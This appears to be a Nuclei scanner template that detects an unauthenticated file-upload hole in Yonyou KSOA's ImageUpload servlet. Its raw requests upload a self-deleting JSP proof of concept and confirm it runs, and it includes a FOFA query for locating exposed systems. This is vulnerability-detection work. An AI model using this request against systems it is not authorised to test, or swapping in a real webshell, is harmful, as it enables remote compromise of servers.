id: yonyou-ksoa-ImageUpload-fileupload
info:
  name: 用友时空 KSOA com.sksoft.bill.ImageUpload - fileupload
  author: SleepingBag945
  severity: critical
  description: 用友时空 KSOA 是用友网络科技股份有限公司建立在 SOA 理念指导下研发的新一代产品，其中 com.sksoft.bill.ImageUpload 存在前台文件上传漏洞，攻击者可以在不登陆的情况下上传恶意 Webshell，控制系统权限。
  reference: 
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8B%E6%97%B6%E7%A9%BA%20KSOA%20V9.0%20%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: app="用友-时空KSOA"
  tags: yonyou,sqli,ksoa,oa

variables:
  filename: "{{to_lower(rand_base(10))}}"

http:
  - raw:
      - |+
        POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename={{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close

        <%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

      - |+
        GET /pictures/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200 && contains((body_2), '12321')"